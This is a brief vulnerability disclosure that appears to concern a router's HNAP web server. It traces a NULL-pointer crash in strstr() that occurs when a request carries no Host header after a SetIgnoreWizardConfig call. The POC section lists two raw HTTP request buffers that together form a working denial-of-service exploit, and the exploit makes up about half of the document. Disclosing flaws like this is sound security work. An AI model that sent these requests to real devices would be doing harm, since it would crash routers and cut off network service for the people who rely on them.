Overview

Vulnerability Details

Untitled

The function sub_4110f4() is registered to handle requests to an unknown URL. If the URL contains any of the following extensions: “.html”, “.asp”, “.php”, “.Login”, and v18 is not zero (which we can control by sending a /HNAP1/SetIgnoreWizardConfig request), it will proceed to the vulnerable branch. This branch passes a1[330] to strstr(). However, a1[330] can be NULL if 'Host' is not specified in the header. Passing a NULL pointer to strstr() could cause the server to unexpectedly crash.

This allows an authorized attacker to perform a DoS attack.

POC

buf1 = b'POST /HNAP1/ HTTP/1.1\\r\\nCookie: hasLogin=1;\\r\\nContent-Length: 312\\r\\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\\r\\nSOAPAction: "<http://purenetworks.com/HNAP1/SetIgnoreWizardConfig>"\\r\\n\\r\\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:xsd="<http://www.w3.org/2001/XMLSchema>" xmlns:soap="<http://schemas.xmlsoap.org/soap/envelope/>"><soap:Body><SetIgnoreWizardConfig xmlns="<http://purenetworks.com/HNAP1/>" /></soap:Body></soap:Envelope>\\r\\n'

buf2 = b'GET /crash.html HTTP/1.1\\r\\n\\r\\n'

Untitled